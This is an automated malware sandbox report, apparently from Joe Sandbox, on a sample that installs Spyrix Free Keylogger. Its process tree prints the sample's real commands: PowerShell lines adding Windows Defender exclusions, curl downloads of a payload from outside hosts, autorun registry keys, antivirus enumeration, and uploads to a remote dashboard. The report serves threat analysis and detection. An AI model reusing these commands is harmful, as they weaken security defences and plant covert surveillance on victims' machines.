Edit tour

Windows Analysis Report
404.exe

Overview

General Information

Sample name:	404.exe
Analysis ID:	1523866
MD5:	d15daef371b50fb739401bfde29df35a
SHA1:	d916c598aff72aaf461a5427cd7c6440c199ff24
SHA256:	ee8a52deddf45bac9caa60205f83488ee644ffd1ea01998774d68c7f46568b71
Tags:	exefiledn-comuser-JAMESWT_MHT
Infos:

Detection

Score:	52
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Adds a directory exclusion to Windows Defender

Creates an undocumented autostart registry key

Found stalling execution ending in API Sleep call

Loading BitLocker PowerShell Module

Machine Learning detection for sample

PE file has nameless sections

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Sigma detected: Suspicious Script Execution From Temp Folder

Sigma detected: WScript or CScript Dropper

Uses cmd line tools excessively to alter registry or file data

Uses netstat to query active network connections and open ports

Uses regedit.exe to modify the Windows registry

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Wscript starts Powershell (via cmd or directly)

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to call native functions

Contains functionality to communicate with device drivers

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to retrieve information about pressed keystrokes

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected non-DNS traffic on DNS port

Detected potential crypto function

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Enables debug privileges

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTML body contains low number of good links

HTML body contains password input but no form action

HTML title does not match URL

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Installs a raw input device (often for capturing keystrokes)

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains executable resources (Code or Archives)

PE file contains more sections than normal

PE file contains sections with non-standard names

Potential key logger detected (key state polling based)

Queries keyboard layouts

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Powershell Defender Exclusion

Sigma detected: Use Short Name Path in Command Line

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Uses reg.exe to modify the Windows registry

Uses taskkill to terminate processes

Classification

Process Tree

System is w10x64

404.exe (PID: 6276 cmdline: "C:\Users\user\Desktop\404.exe" MD5: D15DAEF371B50FB739401BFDE29DF35A)

cmd.exe (PID: 4252 cmdline: "cmd.exe" /c C:\Users\user~1\AppData\Local\Temp\d55b5edc-beb4-4418-b1de-2b3817e31a87\\d55b5edc-beb4-4418-b1de-2b3817e31a87.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 4092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

reg.exe (PID: 344 cmdline: reg query "HKU\S-1-5-19\Environment" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)

powershell.exe (PID: 1528 cmdline: powershell.exe add-mpPreference -exclusionPath "'C:\Users\user~1\AppData\Local\Temp\d55b5edc-beb4-4418-b1de-2b3817e31a87'" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

curl.exe (PID: 7320 cmdline: curl.exe --insecure --user-agent "sfk-dst-loader-2.0" -o "C:\Users\user~1\AppData\Local\Temp\d55b5edc-beb4-4418-b1de-2b3817e31a87\l" https://cdnbaynet.com/loader/link.php?prg_id=sfk MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)

curl.exe (PID: 7352 cmdline: curl.exe --insecure --user-agent "sfk-dst-loader-2.0" -o "C:\Users\user~1\AppData\Local\Temp\d55b5edc-beb4-4418-b1de-2b3817e31a87\404.exe" https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exe MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)

404.exe (PID: 7660 cmdline: "C:\Users\user~1\AppData\Local\Temp\d55b5edc-beb4-4418-b1de-2b3817e31a87\404.exe" MD5: 0F335D8996D82DA30FE9286C671FA0CD)

404.tmp (PID: 7676 cmdline: "C:\Users\user~1\AppData\Local\Temp\is-TGL7N.tmp\404.tmp" /SL5="$303F4,32862490,227328,C:\Users\user~1\AppData\Local\Temp\d55b5edc-beb4-4418-b1de-2b3817e31a87\404.exe" MD5: BFA3F09DEEE00832D000F497EC5B570A)

cmd.exe (PID: 7752 cmdline: "C:\Windows\system32\cmd.exe" /c C:\Users\user~1\AppData\Local\Temp\is-NKDPA.tmp\d.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7760 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7796 cmdline: C:\Windows\system32\cmd.exe /c "wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /value" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

WMIC.exe (PID: 7812 cmdline: wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /value MD5: E2DE6500DE1148C7F6027AD50AC8B891)

cmd.exe (PID: 7856 cmdline: "C:\Windows\system32\cmd.exe" /c C:\Users\user~1\AppData\Local\Temp\is-NKDPA.tmp\d.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7864 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7904 cmdline: C:\Windows\system32\cmd.exe /c "wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /value" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

WMIC.exe (PID: 7920 cmdline: wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /value MD5: E2DE6500DE1148C7F6027AD50AC8B891)

cmd.exe (PID: 7988 cmdline: "C:\Windows\system32\cmd.exe" /c C:\Users\user~1\AppData\Local\Temp\is-NKDPA.tmp\ex.cmd MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

reg.exe (PID: 8040 cmdline: reg export "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" "C:\Users\user~1\AppData\Local\Temp\is-NKDPA.tmp\ex" /y MD5: 227F63E1D9008B36BDBCC4B397780BE4)

cmd.exe (PID: 8064 cmdline: "C:\Windows\system32\cmd.exe" /c C:\Users\user~1\AppData\Local\Temp\is-NKDPA.tmp\pswd.cmd MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 8120 cmdline: powershell.exe add-mpPreference -ExclusionProcess '404.*' MD5: 04029E121A0CFA5991749937DD22A1D9)

powershell.exe (PID: 1252 cmdline: powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\' MD5: 04029E121A0CFA5991749937DD22A1D9)

powershell.exe (PID: 3652 cmdline: powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\*' MD5: 04029E121A0CFA5991749937DD22A1D9)

powershell.exe (PID: 4704 cmdline: powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

powershell.exe (PID: 400 cmdline: powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sps.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

powershell.exe (PID: 6992 cmdline: powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

powershell.exe (PID: 7556 cmdline: powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

powershell.exe (PID: 7408 cmdline: powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sps.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

powershell.exe (PID: 2024 cmdline: powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

cmd.exe (PID: 7712 cmdline: "C:\Windows\system32\cmd.exe" /c C:\Users\user~1\AppData\Local\Temp\is-NKDPA.tmp\ex.cmd MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

reg.exe (PID: 4516 cmdline: reg export "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" "C:\Users\user~1\AppData\Local\Temp\is-NKDPA.tmp\ex" /y MD5: 227F63E1D9008B36BDBCC4B397780BE4)

taskkill.exe (PID: 7784 cmdline: "C:\Windows\system32\taskkill.exe" /IM cmd.exe /IM wlg.exe /IM spmm.exe /IM spkl.exe /IM spm.exe /IM sem.exe /IM clv.exe /IM akl.exe /IM sps.exe /IM sime64.exe /IM ff.exe /IM mrec.exe /IM clvhost.exe /IM ffws.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

conhost.exe (PID: 7756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskkill.exe (PID: 7928 cmdline: "C:\Windows\system32\taskkill.exe" /IM cmd.exe /IM wlg.exe /IM spmm.exe /IM spkl.exe /IM spm.exe /IM sem.exe /IM clv.exe /IM akl.exe /IM sps.exe /IM sime64.exe /IM ff.exe /IM mrec.exe /IM clvhost.exe /IM ffws.exe /F MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

conhost.exe (PID: 7940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

regedit.exe (PID: 5772 cmdline: "regedit.exe" /e "C:\ProgramData\Spyrix Free Keylogger\temp\reg\info.uid" "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1" MD5: BD63D72DB4FA96A1E0250B1D36B7A827)

reg.exe (PID: 8084 cmdline: "reg.exe" delete "HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)

conhost.exe (PID: 8076 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

spkl.exe (PID: 5132 cmdline: "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe" MD5: 11ADE4625528B6E7E1601681867E094E)

cmd.exe (PID: 3924 cmdline: "C:\Windows\system32\cmd.exe" /c netstat.exe -e > "C:\Users\user~1\AppData\Local\Temp\nse" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7740 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

NETSTAT.EXE (PID: 3396 cmdline: netstat.exe -e MD5: 9DB170ED520A6DD57B5AC92EC537368A)

qrl.exe (PID: 3020 cmdline: "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe" --insecure -d @app_Monitoring_StartButton_83C0CF468771E10150E77501F8BEB4AB https://spyrix.net/dashboard/prg-actions MD5: D9EA512EE580ECFFEE587A4C3759527F)

conhost.exe (PID: 1588 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

qrl.exe (PID: 4008 cmdline: "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe" --insecure -d @app_Monitoring_Start_83C0CF468771E10150E77501F8BEB4AB https://spyrix.net/dashboard/prg-actions MD5: D9EA512EE580ECFFEE587A4C3759527F)

conhost.exe (PID: 2676 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

qrl.exe (PID: 6208 cmdline: "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe" --insecure -d @app_Run_First_83C0CF468771E10150E77501F8BEB4AB https://spyrix.net/dashboard/prg-actions MD5: D9EA512EE580ECFFEE587A4C3759527F)

conhost.exe (PID: 6444 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

spmm.exe (PID: 4900 cmdline: "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe" "Spyrix Free Keylogger 11.6.22" MD5: C0E67E8723775249CA0AE2C52E7EDD9E)

qrl.exe (PID: 7324 cmdline: "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe" --insecure -d @app_wizard_Start_83C0CF468771E10150E77501F8BEB4AB https://spyrix.net/dashboard/prg-actions MD5: D9EA512EE580ECFFEE587A4C3759527F)

conhost.exe (PID: 4360 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

qrl.exe (PID: 7440 cmdline: "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe" --insecure -d @app_wizard_Start_83C0CF468771E10150E77501F8BEB4AB https://spyrix.net/dashboard/prg-actions MD5: D9EA512EE580ECFFEE587A4C3759527F)

conhost.exe (PID: 7452 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

wscript.exe (PID: 2980 cmdline: "C:\Windows\System32\WScript.exe" "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\plist.vbs" MD5: FF00E0480075B095948000BDC66E81F0)

cmd.exe (PID: 2008 cmdline: "C:\Windows\System32\cmd.exe" /c plist.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 3872 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 4432 cmdline: chcp 65001 MD5: 20A59FB950D8A191F7D35C4CA7DA9CAF)

timeout.exe (PID: 5652 cmdline: timeout 20 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

cmd.exe (PID: 7508 cmdline: cmd /c exit 83 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

cmd.exe (PID: 6104 cmdline: cmd /c exit 112 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

cmd.exe (PID: 4376 cmdline: cmd /c exit 121 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

cmd.exe (PID: 3588 cmdline: cmd /c exit 114 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

cmd.exe (PID: 6108 cmdline: cmd /c exit 105 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

cmd.exe (PID: 7424 cmdline: cmd /c exit 120 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

tasklist.exe (PID: 1416 cmdline: TASKLIST /FI "IMAGENAME eq spm.exe" /FO CSV /NH MD5: 0A4448B31CE7F83CB7691A2657F330F1)

find.exe (PID: 2356 cmdline: find "spm" MD5: 15B158BC998EEF74CFDD27C44978AEA0)

cmd.exe (PID: 6552 cmdline: C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\dashboard.cmd" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 5336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

timeout.exe (PID: 2824 cmdline: timeout 6 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

chrome.exe (PID: 744 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://dashboard.spyrix.com/ MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)

chrome.exe (PID: 4240 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 --field-trial-handle=1884,i,11941437958654227887,11152764312835152294,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)

cleanup

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-BG5BA.tmp	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000049.00000000.3114492355.0000000000401000.00000020.00000001.01000000.00000019.sdmp	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
73.0.spmm.exe.400000.0.unpack	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: powershell.exe add-mpPreference -exclusionPath "'C:\Users\user~1\AppData\Local\Temp\d55b5edc-beb4-4418-b1de-2b3817e31a87'", CommandLine: powershell.exe add-mpPreference -exclusionPath "'C:\Users\user~1\AppData\Local\Temp\d55b5edc-beb4-4418-b1de-2b3817e31a87'", CommandLine|base64offset|contains: i~yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "cmd.exe" /c C:\Users\user~1\AppData\Local\Temp\d55b5edc-beb4-4418-b1de-2b3817e31a87\\d55b5edc-beb4-4418-b1de-2b3817e31a87.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 4252, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe add-mpPreference -exclusionPath "'C:\Users\user~1\AppData\Local\Temp\d55b5edc-beb4-4418-b1de-2b3817e31a87'", ProcessId: 1528, ProcessName: powershell.exe

Sigma detected: Suspicious Script Execution From Temp Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell.exe add-mpPreference -exclusionPath "'C:\Users\user~1\AppData\Local\Temp\d55b5edc-beb4-4418-b1de-2b3817e31a87'", CommandLine: powershell.exe add-mpPreference -exclusionPath "'C:\Users\user~1\AppData\Local\Temp\d55b5edc-beb4-4418-b1de-2b3817e31a87'", CommandLine|base64offset|contains: i~yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "cmd.exe" /c C:\Users\user~1\AppData\Local\Temp\d55b5edc-beb4-4418-b1de-2b3817e31a87\\d55b5edc-beb4-4418-b1de-2b3817e31a87.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 4252, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe add-mpPreference -exclusionPath "'C:\Users\user~1\AppData\Local\Temp\d55b5edc-beb4-4418-b1de-2b3817e31a87'", ProcessId: 1528, ProcessName: powershell.exe

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\plist.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\plist.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user~1\AppData\Local\Temp\is-TGL7N.tmp\404.tmp" /SL5="$303F4,32862490,227328,C:\Users\user~1\AppData\Local\Temp\d55b5edc-beb4-4418-b1de-2b3817e31a87\404.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp, ParentProcessId: 7676, ParentProcessName: 404.tmp, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\plist.vbs" , ProcessId: 2980, ProcessName: wscript.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp, ProcessId: 7676, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\localSPM

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Use Short Name Path in Command Line

Source: Process started

Author: frack113, Nasreddine Bencherchali: Data: Command: "cmd.exe" /c C:\Users\user~1\AppData\Local\Temp\d55b5edc-beb4-4418-b1de-2b3817e31a87\\d55b5edc-beb4-4418-b1de-2b3817e31a87.cmd, CommandLine: "cmd.exe" /c C:\Users\user~1\AppData\Local\Temp\d55b5edc-beb4-4418-b1de-2b3817e31a87\\d55b5edc-beb4-4418-b1de-2b3817e31a87.cmd, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\404.exe", ParentImage: C:\Users\user\Desktop\404.exe, ParentProcessId: 6276, ParentProcessName: 404.exe, ProcessCommandLine: "cmd.exe" /c C:\Users\user~1\AppData\Local\Temp\d55b5edc-beb4-4418-b1de-2b3817e31a87\\d55b5edc-beb4-4418-b1de-2b3817e31a87.cmd, ProcessId: 4252, ProcessName: cmd.exe

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\plist.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\plist.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user~1\AppData\Local\Temp\is-TGL7N.tmp\404.tmp" /SL5="$303F4,32862490,227328,C:\Users\user~1\AppData\Local\Temp\d55b5edc-beb4-4418-b1de-2b3817e31a87\404.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp, ParentProcessId: 7676, ParentProcessName: 404.tmp, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\plist.vbs" , ProcessId: 2980, ProcessName: wscript.exe

Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: , EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp, ProcessId: 7676, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\kbdsprt

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe add-mpPreference -exclusionPath "'C:\Users\user~1\AppData\Local\Temp\d55b5edc-beb4-4418-b1de-2b3817e31a87'", CommandLine: powershell.exe add-mpPreference -exclusionPath "'C:\Users\user~1\AppData\Local\Temp\d55b5edc-beb4-4418-b1de-2b3817e31a87'", CommandLine|base64offset|contains: i~yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "cmd.exe" /c C:\Users\user~1\AppData\Local\Temp\d55b5edc-beb4-4418-b1de-2b3817e31a87\\d55b5edc-beb4-4418-b1de-2b3817e31a87.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 4252, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe add-mpPreference -exclusionPath "'C:\Users\user~1\AppData\Local\Temp\d55b5edc-beb4-4418-b1de-2b3817e31a87'", ProcessId: 1528, ProcessName: powershell.exe

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: 404.exe	ReversingLabs: Detection: 76%
Source: 404.exe	Virustotal: Detection: 75%			Perma Link

Machine Learning detection for sample

Source: 404.exe

Joe Sandbox ML: detected

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 65_2_0025C770 memset,CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,	65_2_0025C770
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 65_2_00259BC0 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,	65_2_00259BC0
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 65_2_00259D10 memcpy,memmove,memset,CertFreeCertificateContext,WSAGetLastError,strtol,strchr,strlen,strncpy,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strchr,strchr,strncmp,strncmp,strncmp,strncmp,strncmp,strncmp,strncmp,strncmp,CertEnumCertificatesInStore,CertEnumCertificatesInStore,CertEnumCertificatesInStore,CertFreeCertificateContext,CertEnumCertificatesInStore,CertEnumCertificatesInStore,CertFreeCertificateContext,CertFreeCertificateContext,strchr,strlen,CertOpenStore,CryptStringToBinaryA,CertFindCertificateInStore,CertCloseStore,CertFreeCertificateContext,CertFreeCertificateContext,GetLastError,CertFreeCertificateContext,	65_2_00259D10

